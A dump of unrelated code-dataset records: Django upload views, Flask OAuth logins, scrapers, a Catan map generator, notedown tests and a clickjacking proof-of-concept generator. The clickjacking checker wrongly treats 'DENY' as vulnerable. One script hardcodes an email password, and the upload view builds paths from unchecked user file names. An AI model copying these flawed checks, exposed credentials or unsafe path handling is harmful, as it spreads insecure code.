resStr += ','\n resStr = resStr[:-1]\n resStr += ']'\n return resStr, classModel\n\ndef classification(filePath, fileType):\n dataStr, classModel = magicBox(filePath, fileType)\n if classModel == 'noModel': return dataStr\n postData = '{\"instances\": ' + dataStr + '}'\n # postData = '{\"instances\": [1.0, 2.0, 5.0]}'\n url = 'http://172.25.0.6:8501/v1/models/' + classModel + ':predict'\n r = requests.post(url, postData) \n res = json.loads(str(r.text))\n autoNode = res['predictions'][0]\n return autoNode\n\ndef dimRed(unode, fnode):\n fv = np.array([float(x) for x in fnode.classVector.split()])\n uv = np.array([float(x) for x in unode.classVector.split()])\n userClass, _ = divmod(np.argmax(np.outer(uv, fv)), len(uv)) \n return userClass\n\n'''\n\n获取上传文件并保存到对应用户下\n\n@param request Get/Post请求\n@return JsonResponse(res) \n@exception/throws IntegrityError 文件名冲突\n\n'''\n\ndef upload(request):\n res = {}\n res['status'] = 'ERROR'\n\n if request.method == 'POST':\n myFile = request.FILES.getlist(\"userfiles\", [])\n fileIdList = []\n fileExceptList = []\n res['fileId'] = ''\n wrongFlag = 0\n \n for filePot in myFile:\n fileName = filePot.name\n fileId = makeFileId();\n fileType = checkFileType(fileName)\n userId = request.POST.get(\"userId\")\n user = User.objects.get(userId=userId)\n\n newFile = FileMap()\n newFile.fileId = fileId\n newFile.ownermap = user\n newFile.filePath = os.path.join(settings.MEDIA_ROOT, str(userId), fileName)\n newFile.fileType = fileType\n newFile.fileField = filePot\n newFile.fileMd5 = hashlib.md5(str(filePot).encode(\"utf-8\")).hexdigest()\n newFile.buildTime = datetime.now()\n newFile.modTime = datetime.now()\n newFile.readTime = datetime.now()\n try:\n newFile.save()\n fileIdList.append(fileId)\n except IntegrityError as err:\n fileExceptList.append(fileName)\n wrongFlag = 1\n res['status'] = str(err)\n fileVector = classification(newFile.filePath, fileType)\n # res['fileVector'] = fileVector\n if len(fileVector):\n fnode = FileNode() \n fnode.filemap = newFile\n fnode.classVector = str(fileVector)[1:-1].replace(',', '') # 1.222 2.444 4.777\n fnode.save()\n\n unode = UserNode.objects.filter(usermap=user) \n if not unode.exists():\n unode = UserNode()\n unode.usermap = user\n unode.classVector = str(list(np.ones(len(fileVector))))[1:-1].replace(',','') # 1.0 1.0 1.0\n unode.save()\n else:\n unode = unode[0]\n \n autoNode = dimRed(fnode, unode)\n nodes = NodeMap.objects.filter(unodemap=unode, nodeValue=autoNode)\n if nodes.exists():\n nodeName = nodes[0].nodeName\n else:\n nodeName = \"newNode\" + str(autoNode)\n \n newNode = NodeMap()\n newNode.fnodemap = fnode\n newNode.unodemap = unode\n newNode.nodeName = nodeName\n newNode.nodeValue = autoNode\n newNode.save()\n res['class'] = int(autoNode)\n\n res['fileType'] = fileType\n \n newQuery = UserFile()\n newQuery.usermap = user\n newQuery.filemap = newFile\n newQuery.fileName = os.path.basename(newFile.filePath)\n newQuery.fileClass = autoNode\n #设定上传文件夹路径\n newQuery.dirId = 0\n newQuery.save()\n\n if wrongFlag == 0:\n res['status'] = 'OK'\n elif wrongFlag == 1:\n res['fileExcept'] = fileExceptList\n res['fileId'] = fileIdList\n return JsonResponse(res)\n\ndef commitFile(request):\n res = {}\n res['state'] = 'error'\n if request.method == 'POST':\n userId = request.POST.get(\"userId\")\n filesId = request.POST.getlist(\"fileId\", [])\n commitMsg = request.POST.get(\"commitMsg\")\n change = 0\n for fileId in filesId:\n usermap = User.objects.get(userId=userId)\n filemap = FileMap.objects.get(fileId=fileId)\n uf = UserFile.objects.get(usermap=usermap, filemap=filemap)\n uf.commitMsg = commitMsg\n uf.save()\n change = change + 1\n res['change'] = change\n res['state'] = 'ok'\n\n return JsonResponse(res, safe=False)\n\n\n","sub_path":"Apache-Django/autosort/fileManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479337757","text":"# import from system\nfrom concurrent.futures import ThreadPoolExecutor as executor\nfrom typing import Optional\n\n#import from packages\nimport requests\nimport pandas as pd\nimport pendulum\n\n\n#app imports\nfrom DB.transactions import add_batch_observations\n\n__all__ = ['fetch']\n\ndef build_url(num:int) -> str:\n \"\"\"\n builds the url to fetch the data at ipeadatas webpage. \n \"\"\"\n return f'http://ipeadata.gov.br/ExibeSerie.aspx?oper=export&serid{num}={num}'\n \n\ndef process(url:str) -> pd.DataFrame:\n \"\"\"\n fetch the data returning a dataframe\n \"\"\"\n df = pd.read_excel(url, parse_dates=[0])\n df.columns = [\"data\", \"values\"]\n return df.set_index([\"data\"])\n\n\ndef fetch(tickers:list, limit: Optional[int]) -> dict:\n \"\"\"\n \"\"\"\n global dfs\n urls =[build_url(tcks.split(\".\")[1]) for tcks in tickers]\n with executor() as e:\n dfs = list(e.map(process, urls))\n\n with executor() as e1:\n dz = zip(tickers, dfs)\n e1.map(lambda z: add_batch_observations(*z), list(dz))\n \n return {\"source\": \"IPEA\", \"status\": \"updated\", \n \"time\": pendulum.now().to_datetime_string(), \n \"limit\": limit}\n\n\n\n","sub_path":"Loaders/Observations/ipea.py","file_name":"ipea.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"19684451","text":"# -*- coding: utf-8 -*-\n\nimport logging\nimport os\n\nimport flask\nimport requests\nfrom flask import Response, redirect, url_for, request, session, jsonify, flash\nfrom flask_github import GitHub\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user, current_user\n\nfrom .constants import PYBEL_GITHUB_CLIENT_ID, PYBEL_GITHUB_CLIENT_SECRET\n\nlogin_log = logging.getLogger('pybel.web.login')\n\n\ndef get_github_info(token):\n return requests.get('https://api.github.com/user', params={'access_token': token}).json()\n\n\nadministrator_usernames = {'cthoyt', 'ddomingof', 'cebel'}\n\n\nclass User(UserMixin):\n def __init__(self, github_access_token):\n self.id = github_access_token\n info = get_github_info(github_access_token)\n self.username = info['login']\n self.name = info['name']\n self.user_id = int(info['id'])\n\n def __repr__(self):\n return self.id\n\n @property\n def admin(self):\n return self.username in administrator_usernames\n\n @property\n def display(self):\n return self.name if self.name else self.username\n\n\ndef build_github_login_service(app):\n \"\"\"Adds the login service\n \n Before adding this service, both ``GITHUB_CLIENT_ID`` and ``GITHUB_CLIENT_SECRET`` need to be set in the app's\n configuration\n \n :param flask.Flask app: A Flask app\n \"\"\"\n app.config.update({\n 'GITHUB_CLIENT_ID': os.environ[PYBEL_GITHUB_CLIENT_ID],\n 'GITHUB_CLIENT_SECRET': os.environ[PYBEL_GITHUB_CLIENT_SECRET]\n })\n\n # flask-login\n login_manager = LoginManager()\n login_manager.init_app(app)\n login_manager.login_view = 'login'\n\n # setup github-flask\n github = GitHub(app)\n\n @github.access_token_getter\n def token_getter():\n if current_user is not None:\n return current_user.id\n\n @app.route('/login', methods=['GET', 'POST'])\n def login():\n if session.get('user_id', None) is None:\n return github.authorize()\n else:\n flask.flash('Already logged in')\n return redirect(url_for('index'))\n\n @app.route('/github-callback')\n @github.authorized_handler\n def authorized(access_token):\n next_url = request.args.get('next') or url_for('view_networks')\n if access_token is None:\n return redirect(next_url)\n\n user = User(access_token)\n\n if app.config.get('PYBEL_WEB_STRICT_LOGIN') and not user.name:\n flash('Please add your name to your GitHub account to use PyBEL Web')\n return redirect(url_for('index'))\n\n login_user(user)\n login_log.info('Login from %s by %s (%s)', request.remote_addr, user.name, user.username)\n\n return redirect(next_url)\n\n @app.route('/logout')\n @login_required\n def logout():\n logout_user()\n flash('Logged out')\n return redirect(url_for('view_networks'))\n\n @app.errorhandler(401)\n def page_not_found(e):\n return Response('

Login failed

')\n\n # callback to reload the user object\n @login_manager.user_loader\n def load_user(id):\n return User(id)\n\n @app.route('/user')\n @login_required\n def show_user():\n return jsonify(github.get('user'))\n","sub_path":"src/pybel_tools/web/github_login_service.py","file_name":"github_login_service.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311517278","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nbrowser = webdriver.Chrome(executable_path='C:\\\\Users\\\\vinic\\\\Desktop\\\\MyPythonScripts\\\\chromedriver.exe')\r\nbrowser.get('https://inventwithpython.com/')\r\n\r\nlinkElem = browser.find_element_by_link_text('Coding with Minecraft')\r\nlinkElem.click()\r\nlinkElem = browser.find_element_by_link_text('Buy on Amazon')\r\nlinkElem.click()\r\n\r\nbrowser.get('https://mail.yahoo.com')\r\nemailElem = browser.find_elements_by_id('login-username')\r\nemailElem[0].send_keys('teste')\r\nnextElem = browser.find_elements_by_id('login-signin')\r\nnextElem[0].click()","sub_path":"testeSeleniumChrome.py","file_name":"testeSeleniumChrome.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21190826","text":"from app import blueprint, db\nfrom app.models import User, OAuth\n\nfrom flask_dance.consumer import oauth_authorized, oauth_error\nfrom flask_dance.contrib.google import google\nfrom flask_login import login_user\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom flask import flash\n\n\n# Util function which will manage the registration of\n# the account with the local db instance upon successful\n# OAuth authentication with Google.\n@oauth_authorized.connect_via(blueprint)\ndef google_logged_in(blueprint, token):\n if not token:\n flash(\"Failed to login with Google credentials.\", category=\"danger\")\n return False\n\n resp = google.get(\"oauth2/v2/userinfo\")\n if not resp.ok:\n flash(\"Failed to fetch user info from Google.\", category=\"danger\")\n return False\n\n google_info = resp.json()\n google_user_id = google_info.get(\"id\")\n\n # Check the database for existing OAuth token; if one isn't\n # there create one.\n try:\n oauth = OAuth.query.filter_by(\n provider=blueprint.name,\n provider_user_id=google_user_id\n ).one()\n except NoResultFound:\n oauth = OAuth(\n provider=blueprint.name,\n provider_user_id=google_user_id,\n token=token\n )\n\n if oauth.user:\n login_user(oauth.user)\n flash(f\"{oauth.user.name}, login successful.\", category=\"primary\")\n else:\n user = User(\n email=google_info.get(\"email\"),\n name=google_info.get(\"name\")\n )\n oauth.user = user\n db.session.add_all([user, oauth])\n db.session.commit()\n login_user(user)\n flash(f\"{user.name}, registration successful.\", category=\"primary\")\n\n # Short-circuit Flask-Dance'es default behaviour\n return False\n","sub_path":"app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"98125247","text":"# -*- coding: utf-8 -*-\n\"\"\" run_tensorboard \"\"\"\n\nimport os\nimport argparse\n\nfrom constants import Dataset\nfrom utils.utils import get_tensorboard_log_path\n\n\ndef parse_args():\n \"\"\" Parses the arguments \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset',\n type=int,\n default=Dataset.SIGNET_RING,\n help='Dataset logs to use. Options: {}'.format(Dataset.print_choices())\n )\n\n return parser.parse_args()\n\n\ndef main():\n \"\"\" main \"\"\"\n args = parse_args()\n path = get_tensorboard_log_path(args.dataset)\n print(\"Running tensorboard for {} dataset\".format(Dataset.print_name(args.dataset)))\n os.system('tensorboard --logdir {}'.format(path))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run_tensorboard.py","file_name":"run_tensorboard.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"373730339","text":"import optparse\nimport requests\nimport sys\nimport webbrowser\n\ndef main():\n parser = optparse.OptionParser(usage=\"python3 %prog -u -c \")\n parser.add_option(\"-u\", dest=\"url\", default=False, help=\"url target\", type=\"string\")\n parser.add_option(\"-c\", dest=\"cookies\", default=False, help=\"cookies if auth page\", type=\"string\")\n (options, args) = parser.parse_args()\n urlTarget = options.url\n cookiesTarget = options.cookies\n\n if sys.argv[0] == None:\n print(parser.usage)\n\n\n if urlTarget == None or cookiesTarget == None:\n print(parser.usage)\n exit(0)\n else:\n check = checkUrl(urlTarget)\n if check:\n print(\"[+] Vulnerable making PoC\")\n clickJPoc(urlTarget, cookiesTarget)\n else:\n print(\"[-] NOT Vulnerable\")\n exit(0)\n\ndef checkUrl(url):\n if \"http\" not in url:\n Newurl = \"http://\" + url\n \n print(\"[+] Making request to {}\".format(Newurl))\n try:\n r = requests.get(Newurl, allow_redirects=True)\n if not \"X-Frame-Options\" in r.headers:\n return True\n elif r.headers[\"X-Frame-Options\"] == 'DENY':\n return True\n else:\n return False\n\n except Exception as e:\n print(\"[-] Error {}\".format(e))\n\n\ndef clickJPoc(url, cookies=\"\"):\n Newurl = \"http://\" + url\n iframe = \"\"\"\n \n Clickjack test page\n \n

Website is vulnerable to clickjacking!

\n \n \n \n \"\"\".format(Newurl)\n print(\"[+] Writing PoC !\")\n writePoC(iframe)\n\ndef writePoC(iframe):\n\n try:\n f = open(\"/tmp/iframe.html\", 'w')\n f.write(iframe)\n f.close()\n print(\"[+] File write with sucess.. you can now use in your browser\")\n except Exception as e:\n print(\"[+] Something went wrong while writing file\")\n print(e)\n\n ans = input(\"Do u want to open PoC in your browser y/n ? \".lower())\n if ans == \"y\":\n try:\n url = \"file:///tmp/iframe.html\"\n webbrowser.open(url)\n except Exception as e:\n print(\"[-] Error try install webbrowser lib !\")\n print(e) \n else:\n print(\"[+] Go to your Desktop and get the iframe.html!\")\n\n \n\nmain()\n","sub_path":"clickJacking.py","file_name":"clickJacking.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"170391484","text":"import requests,random,smtplib,schedule,time\nfrom bs4 import BeautifulSoup\nfrom urllib.request import quote\nfrom email.mime.text import MIMEText\nfrom email.header import Header\n\n# 获取电影名单\ndef get_movie():\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\n }\n movie_list = []\n for x in range(10):\n URL = 'https://movie.douban.com/top250?start=' + str(x) + '&filter='\n res_movie = requests.get(URL,headers=headers)\n suop_movies = BeautifulSoup(res_movie.text,'html.parser').find_all('div',class_='item')\n for suop_movie in suop_movies:\n movie_name = suop_movie.find(class_='title').text\n movie_list.append(movie_name)\n return movie_list\n\n# 下载电影\ndef download_movie(movie_name):\n movie_name= movie_name\n gbk_movie = movie_name.encode('gbk')\n find_movie = 'http://s.ygdy8.com/plus/s0.php?typeid=1&keyword=' + quote(gbk_movie)\n res_movie = requests.get(find_movie)\n res_movie.encoding = 'gbk'\n suop_movies = BeautifulSoup(res_movie.text,'html.parser').find(class_='co_content8').find_all('table')\n if suop_movies:\n movie_link = 'https://www.ygdy8.com' + suop_movies[0].find('test_1')['href']\n res_movie1 = requests.get(movie_link)\n res_movie1.encoding = 'gbk'\n movie_download_link = BeautifulSoup(res_movie1.text,'html.parser').find('div',id='Zoom').find('span').find('table').find('test_1')['href']\n return movie_name + '的链接为:' + movie_download_link\n else:\n return '没有找到' + movie_name + '的链接'\n\n# 通过随机数获取电影名称\ndef chooise_movie():\n l = []\n for i in range(3):\n x = random.randint(1,250)\n if x in l:\n continue\n else:\n l.append(x - 1)\n return l\n\n# 获取电影名和下载链接\ndef main():\n movie_str = ''\n for i in chooise_movie():\n movie_name = get_movie()[i]\n movie_str += download_movie(movie_name) + \"\\n\"\n return movie_str\n\n# 发送邮件\ndef send_mail():\n mailhost = 'smtp.casc.ac.cn'\n cascmail = smtplib.SMTP()\n cascmail.connect(mailhost,25)\n account = 'czl@casc.ac.cn'\n password = 'idc888888'\n cascmail.login(account, password)\n receiver = '344319484@qq.com'\n message = MIMEText(main(),'plain','utf-8')\n subject = '豆瓣高评分电影下载'\n message['Subject'] = Header(subject,'utf-8')\n try:\n cascmail.sendmail(account,receiver,message.as_string())\n return '邮件发送成功'\n except:\n return '邮件发送失败'\n cascmail.quit()\n\n# 创建定时任务\ndef job():\n print('第一次发送')\n send_mail()\n time.sleep(2)\n print('发送成功')\n\n# 定时任务执行时间\nschedule.every(5).seconds.do(job)\n\n# 每个定时任务执行间隔\nwhile True:\n schedule.run_pending()\n time.sleep(2)","sub_path":"风变编程/python爬虫-山腰班/fb_10/fb_09.py","file_name":"fb_09.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587547661","text":"import random\nimport json\n\nfrom cls.city import City\nfrom cls.tile import Tile\nfrom cls.map import Map\n\n\n\ndef get_random_map(map_layout_json):\n tiles = get_random_tiles(map_layout_json)\n cities = get_random_cities(tiles)\n\n #make lists\n tiles = list(tiles.values())\n cities = list(cities.values())\n\n map = Map(cities, tiles)\n\n return map\n\n\ndef get_random_cities(tiles, city_layout_json = \"map_generation/info/cities.json\"):\n with open(city_layout_json, \"r\") as f:\n city_layout = json.load(f)\n\n cities = {}\n for pos, tiles_idx in city_layout.items():\n tmptiles = [tiles[i] for i in tiles_idx if i in tiles.keys()]\n if len(tmptiles) != 0:\n name = \"_\".join([str(v) for v in tiles_idx])\n cities[name] = City(pos, tmptiles)\n\n return cities\n\ndef get_random_tiles(map_layout_json):\n with open(map_layout_json, \"r\") as f:\n map_layout = json.load(f)\n\n #get lists of dice values, and resources\n dice_values = get_dice_values_list()\n resources = get_resource_list()\n\n\n\n assert len(map_layout) == 44\n assert len(resources) == 25\n assert len(dice_values) == 25\n\n\n #shuffle them to make a random map\n random.shuffle(dice_values)\n random.shuffle(resources)\n\n tiles = {}\n gold_dice_values = [3, 11]\n for position, tile_type in map_layout.items():\n position = int(position)\n\n if tile_type == \"random\":\n res = resources.pop()\n dval = int(dice_values.pop())\n\n t = Tile(position, res, dval)\n tiles[position] = t\n\n elif tile_type == \"gold\":\n dval = gold_dice_values.pop()\n res = \"gold\"\n\n t = Tile(position, res, dval)\n tiles[position] = t\n\n elif tile_type == \"water\":\n t = Tile(position, resource = \"water\", dice_value = None)\n tiles[position] = t\n\n\n return tiles\n\n\n#helper functions\ndef get_dice_values_list():\n with open(\"map_generation/info/dice_values.json\", \"r\") as f:\n dice_dict = json.load(f)\n\n dice_list = []\n for key in dice_dict:\n if key != \"gold\":\n dice_list += [int(key)]*dice_dict[key]\n\n count = {i: dice_list.count(str(i)) for i in range(2, 13)}\n\n return dice_list\n\ndef get_resource_list():\n with open(\"map_generation/info/resources.json\", \"r\") as f:\n tiles_dict = json.load(f)\n\n tile_list = []\n for key in tiles_dict:\n if key != \"gold\":\n tile_list += [key]*tiles_dict[key]\n\n return tile_list\n","sub_path":"map_generation/generate_map.py","file_name":"generate_map.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"460110122","text":"import notedown\n\nsimple_backtick = \"\"\"\n```\ncode1\n space_indent\n```\ntext1\n``\n\n```\ncode2\n\ttab_indent\n~~~\n```\n\ntext2\"\"\"\n\nsimple_tilde = \"\"\"\n~~~\ncode1\n space_indent\n~~~\ntext1\n``\n\n~~~~\ncode2\n\ttab_indent\n~~~\n~~~~\n\ntext2\"\"\"\n\nsimple_indented = \"\"\"\n code1\n space_indent\n\ntext1\n``\n\tcode2\n\t\ttab_indent\n\t~~~\n\ntext2\"\"\"\n\nsimple_code_cells = ['code1\\n space_indent', 'code2\\n\ttab_indent\\n~~~']\nsimple_markdown_cells = ['text1\\n``', 'text2']\n\nalt_lang = \"\"\"\nThis is how you write a code block in another language:\n\n```bash\necho \"This is bash ${BASH_VERSION}!\"\n```\n\"\"\"\n\nalt_lang_code = '%%bash\\necho \"This is bash ${BASH_VERSION}!\"'\n\n\nsample_markdown = u\"\"\"### Create IPython Notebooks from markdown\n\nThis is a simple tool to convert markdown with code into an IPython\nNotebook.\n\nUsage:\n\n```\nnotedown input.md > output.ipynb\n```\n\n\nIt is really simple and separates your markdown into code and not\ncode. Code goes into code cells, not-code goes into markdown cells.\n\nInstallation:\n\n pip install notedown\n\"\"\"\n\n# Generate the sample notebook from the markdown using\n#\n# import notedown\n# reader = notedown.MarkdownReader()\n# sample_notebook = reader.reads(sample_markdown)\n# writer = notedown.JSONWriter()\n# print writer.writes(sample_notebook)\n#\nsample_notebook = r\"\"\"{\n \"metadata\": {},\n \"nbformat\": 3,\n \"nbformat_minor\": 0,\n \"worksheets\": [\n {\n \"cells\": [\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Create IPython Notebooks from markdown\\n\",\n \"\\n\",\n \"This is a simple tool to convert markdown with code into an IPython\\n\",\n \"Notebook.\\n\",\n \"\\n\",\n \"Usage:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"collapsed\": false,\n \"input\": [\n \"notedown input.md > output.ipynb\"\n ],\n \"language\": \"python\",\n \"metadata\": {},\n \"outputs\": []\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"It is really simple and separates your markdown into code and not\\n\",\n \"code. Code goes into code cells, not-code goes into markdown cells.\\n\",\n \"\\n\",\n \"Installation:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"collapsed\": false,\n \"input\": [\n \"pip install notedown\"\n ],\n \"language\": \"python\",\n \"metadata\": {},\n \"outputs\": []\n }\n ],\n \"metadata\": {}\n }\n ]\n}\"\"\"\n\n\ndef create_json_notebook():\n reader = notedown.MarkdownReader()\n writer = notedown.JSONWriter()\n\n notebook = reader.reads(sample_markdown)\n json_notebook = writer.writes(notebook)\n return json_notebook\n\n\ndef test_notedown():\n \"\"\"Integration test the whole thing.\"\"\"\n assert(create_json_notebook() == sample_notebook)\n\n\ndef parse_cells(text, regex):\n reader = notedown.MarkdownReader(code_regex=regex)\n return reader.parse_blocks(text)\n\n\ndef separate_code_cells(cells):\n codetype = notedown.MarkdownReader.code\n code_cells = [c['content'] for c in cells if c['type'] == codetype]\n return code_cells\n\n\ndef separate_markdown_cells(cells):\n markdowntype = notedown.MarkdownReader.markdown\n markdown_cells = [c['content'] for c in cells if c['type'] == markdowntype]\n return markdown_cells\n\n\ndef test_parse_gfm():\n \"\"\"Test with GFM code blocks.\"\"\"\n all_cells = parse_cells(simple_backtick, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_parse_tilde():\n \"\"\"Test with ~~~ delimited code blocks.\"\"\"\n all_cells = parse_cells(simple_tilde, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_parse_indented():\n \"\"\"Test with indented code blocks.\"\"\"\n all_cells = parse_cells(simple_indented, 'indented')\n\n code_cells = separate_code_cells(all_cells)\n markdown_cells = separate_markdown_cells(all_cells)\n\n assert(code_cells == simple_code_cells)\n assert(markdown_cells == simple_markdown_cells)\n\n\ndef test_alt_lang():\n \"\"\"Specifying a language that isn't python should generate\n code blocks using %%language magic.\"\"\"\n all_cells = parse_cells(alt_lang, 'fenced')\n\n code_cells = separate_code_cells(all_cells)\n\n assert(code_cells[0] == alt_lang_code)\n\n\ndef test_format_agnostic():\n \"\"\"Test whether we can process markdown with either fenced or\n indented blocks.\"\"\"\n fenced_cells = parse_cells(simple_backtick, None)\n indented_cells = parse_cells(simple_indented, None)\n\n fenced_code_cells = separate_code_cells(fenced_cells)\n indented_code_cells = separate_code_cells(indented_cells)\n\n fenced_markdown_cells = separate_markdown_cells(fenced_cells)\n indented_markdown_cells = separate_markdown_cells(indented_cells)\n\n assert(fenced_code_cells == indented_code_cells)\n assert(fenced_markdown_cells == indented_markdown_cells)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"282632912","text":"#题目:求s=a+aa+aaa+aaaa+aa...a的值,其中a是一个数字。\n# 例如2+22+222+2222+22222(此时共有5个数相加),几个数相加有键盘控制。\n#程序分析:关键是计算出每一项的值。\ndef suma(a,n):\n sum = 0\n for i in range(1,n+1):\n def num(i):\n if i == 1:\n return a\n else:\n return (num(i-1) + (a * (10**(i-1))))\n sum = sum + num(i)\n return sum\nprint(suma(2,3))","sub_path":"test/test18.py","file_name":"test18.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211371973","text":"# Проанализировать скорость и сложность одного любого алгоритма из разработанных\n# в рамках домашнего задания первых трех уроков. \n\n\n# В массиве найти максимальный отрицательный элемент. Вывести на экран его значение и позицию в массиве.\n\nimport random\n\n# Вариант с одним циклом\ndef amax1(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n \n i = 0\n amax = -1\n\n while i < n:\n if a[i] < 0 and amax == -1:\n amax = i\n elif a[i] < 0 and a[i] > a[amax]:\n amax = i\n \n i += 1\n \n return a[amax], amax\n \n# Вариант с 2мя циклами\ndef amax2(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n\n amax = 0\n\n while True:\n if a[amax] > 0:\n amax += 1\n else:\n break\n\n for i in range(1, len(a)):\n if a[amax] < a[i] and a[i] < 0:\n amax = i\n \n return a[amax], amax\n\n# Вариант с двумя циклами, промежуточным списком и функцией max\ndef amax3(n):\n random.seed(44)\n a = [random.randint(-100, 100) for _ in range(0, n)]\n #print('Исходный массив', a)\n \n i = 0\n b = []\n amax = 0\n\n while i < n:\n if a[i] < 0:\n b.append(a[i])\n \n i += 1\n \n bmax = max(b)\n \n for i in range(0, len(a)):\n if a[i] == bmax:\n amax = i\n \n return bmax, amax\n\n#В результате проверки быстродействия на массивах размером от 50 до 500 с шагом в 50\n#оказалось что вариант с двумя циклами оказался быстрее, так как первый цикл\n#ороткий, а во втором проверяется одно условие в отличие от варианта с одним циклом, \n#но с двумя условиями в нем. Вариант с двумя циклами и промежуточным массивом и функцией max\n#оказался самым медленным, но незначительно. Судя по графику сложность алгоритма относится к постоянной.\n\nimport matplotlib.pyplot as plt\n\na = [89, 169, 243, 329, 410, 498, 558, 647, 742, 799]\nb = [87, 157, 234, 313, 384, 459, 549, 602, 677, 779]\nc = [90, 166, 253, 331, 416, 492, 567, 679, 740, 808]\n\nplt.plot(a, label='с одним циклом')\nplt.plot(b, label='с 2мя циклами')\nplt.plot(c, label='с двумя циклами и ф-ей max')\nplt.legend()\nplt.show()\n\n# Вариант с одним циклом\n# \"import task_1\" \"task_1.amax1(50)\"\n# 1000 loops, best of 5: 88.9 usec per loop\n\n# \"import task_1\" \"task_1.amax1(100)\"\n# 1000 loops, best of 5: 169 usec per loop\n\n# \"import task_1\" \"task_1.amax1(150)\"\n# 1000 loops, best of 5: 243 usec per loop\n\n# \"import task_1\" \"task_1.amax1(200)\"\n# 1000 loops, best of 5: 329 usec per loop\n\n# \"import task_1\" \"task_1.amax1(250)\"\n# 1000 loops, best of 5: 410 usec per loop\n\n# \"import task_1\" \"task_1.amax1(300)\"\n# 1000 loops, best of 5: 498 usec per loop\n\n# \"import task_1\" \"task_1.amax1(350)\"\n# 1000 loops, best of 5: 558 usec per loop\n\n# \"import task_1\" \"task_1.amax1(400)\"\n# 1000 loops, best of 5: 647 usec per loop\n\n# \"import task_1\" \"task_1.amax1(450)\"\n# 1000 loops, best of 5: 742 usec per loop\n\n# \"import task_1\" \"task_1.amax1(500)\"\n# 1000 loops, best of 5: 799 usec per loop\n\n\n# Вариант с 2мя циклами\n# \"import task_1\" \"task_1.amax2(50)\"\n# 1000 loops, best of 5: 86.6 usec per loop\n\n# \"import task_1\" \"task_1.amax2(100)\"\n# 1000 loops, best of 5: 157 usec per loop\n\n# \"import task_1\" \"task_1.amax2(150)\"\n# 1000 loops, best of 5: 234 usec per loop\n\n# \"import task_1\" \"task_1.amax2(200)\"\n# 1000 loops, best of 5: 313 usec per loop\n\n# \"import task_1\" \"task_1.amax2(250)\"\n# 1000 loops, best of 5: 384 usec per loop\n\n# \"import task_1\" \"task_1.amax2(300)\"\n# 1000 loops, best of 5: 459 usec per loop\n\n# \"import task_1\" \"task_1.amax2(350)\"\n# 1000 loops, best of 5: 549 usec per loop\n\n# \"import task_1\" \"task_1.amax2(400)\"\n# 1000 loops, best of 5: 602 usec per loop\n\n# \"import task_1\" \"task_1.amax2(450)\"\n# 1000 loops, best of 5: 677 usec per loop\n\n# \"import task_1\" \"task_1.amax2(500)\"\n# 1000 loops, best of 5: 779 usec per loop\n\n\n# Вариант с двумя циклами, промежуточным списком и функцией max\n# \"import task_1\" \"task_1.amax3(50)\"\n# 1000 loops, best of 5: 90 usec per loop\n\n# \"import task_1\" \"task_1.amax3(100)\"\n# 1000 loops, best of 5: 166 usec per loop\n\n# \"import task_1\" \"task_1.amax3(150)\"\n# 1000 loops, best of 5: 253 usec per loop\n\n# \"import task_1\" \"task_1.amax3(200)\"\n# 1000 loops, best of 5: 331 usec per loop\n\n# \"import task_1\" \"task_1.amax3(250)\"\n# 1000 loops, best of 5: 416 usec per loop\n\n# \"import task_1\" \"task_1.amax3(300)\"\n# 1000 loops, best of 5: 492 usec per loop\n\n# \"import task_1\" \"task_1.amax3(350)\"\n# 1000 loops, best of 5: 567 usec per loop\n\n# \"import task_1\" \"task_1.amax3(400)\"\n# 1000 loops, best of 5: 679 usec per loop\n\n# \"import task_1\" \"task_1.amax3(450)\"\n# 1000 loops, best of 5: 740 usec per loop\n\n# 